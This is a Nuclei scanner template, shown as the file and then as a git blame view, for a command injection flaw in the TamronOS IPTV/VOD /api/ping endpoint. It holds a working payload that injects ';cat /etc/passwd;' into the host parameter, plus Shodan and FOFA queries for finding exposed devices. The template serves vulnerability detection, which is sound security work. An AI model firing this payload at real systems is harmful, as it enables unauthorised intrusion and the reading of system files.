nuclei-templates/vulnerabilities/other/tamronos-rce.yaml

id: tamronos-rce

info:
  name: TamronOS IPTV/VOD - Remote Command Execution
  author: pikpikcu
  severity: critical
  description: |
    TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint.
  reference:
    - https://twitter.com/sec715/status/1405336456923471874
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-78
  metadata:
    verified: true
    shodan-query: title:"TamronOS IPTV系统"
    fofa-query: title="TamronOS IPTV系统"
  tags: tamronos,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by cs on 2022/05/13
Create tamronos-rce.yaml 2021-06-17 01:31:59 +00:00			`id: tamronos-rce`

			`info:`
Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs 2022-05-13 20:52:51 +00:00			`name: TamronOS IPTV/VOD - Remote Command Execution`
Create tamronos-rce.yaml 2021-06-17 01:31:59 +00:00			`author: pikpikcu`
			`severity: critical`
Spacing, syntax error 2022-05-16 17:54:13 +00:00			`description: \|`
			`TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://twitter.com/sec715/status/1405336456923471874`
Spacing, correct this time. 2022-05-16 18:04:07 +00:00			`classification:`
Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs 2022-05-13 20:52:51 +00:00			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 10.0`
			`cwe-id: CWE-78`
Update metadata query (#4350) * Update adobe-component-login.yaml * Update cold-fusion-cfcache-map.yaml * Update unpatched-coldfusion.yaml * Update coldfusion-debug-xss.yaml * Update CVE-2020-11978.yaml * Update CVE-2020-13927.yaml * Update CVE-2021-38540.yaml * Update CVE-2021-44451.yaml * Update CVE-2022-24288.yaml * Update airflow-debug.yaml * Update airflow-detect.yaml * Update CVE-2010-0219.yaml * Update apache-axis-detect.yaml * Update CVE-2020-11991.yaml * Update apache-cocoon-detect.yaml * Update CVE-2021-21402.yaml * Update jellyfin-detect.yaml * Update CVE-2021-21402.yaml * Update CVE-2021-21402.yaml * Update ecology-arbitrary-file-upload.yaml * Update ecology-v8-sqli.yaml * Update ecology-syncuserinfo-sqli.yaml * Update ecology-filedownload-directory-traversal.yaml * Update CNVD-2021-15822.yaml * Update dedecms-carbuyaction-fileinclude.yaml * Update dedecms-openredirect.yaml * Update tamronos-rce.yaml * Update natshell-path-traversal.yaml 2022-05-12 14:18:36 +00:00			`metadata:`
			`verified: true`
			`shodan-query: title:"TamronOS IPTV系统"`
			`fofa-query: title="TamronOS IPTV系统"`
Extra newlines and one sp;acing issue 2022-05-16 20:14:51 +00:00			`tags: tamronos,rce`
Create tamronos-rce.yaml 2021-06-17 01:31:59 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update tamronos-rce.yaml 2021-06-17 01:34:49 +00:00			`- "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp"`
Create tamronos-rce.yaml 2021-06-17 01:31:59 +00:00
			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "root:.*:0:0:"`
Create tamronos-rce.yaml 2021-06-17 01:31:59 +00:00
			`- type: status`
			`status:`
			`- 200`
Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs 2022-05-13 20:52:51 +00:00
			`# Enhanced by cs on 2022/05/13`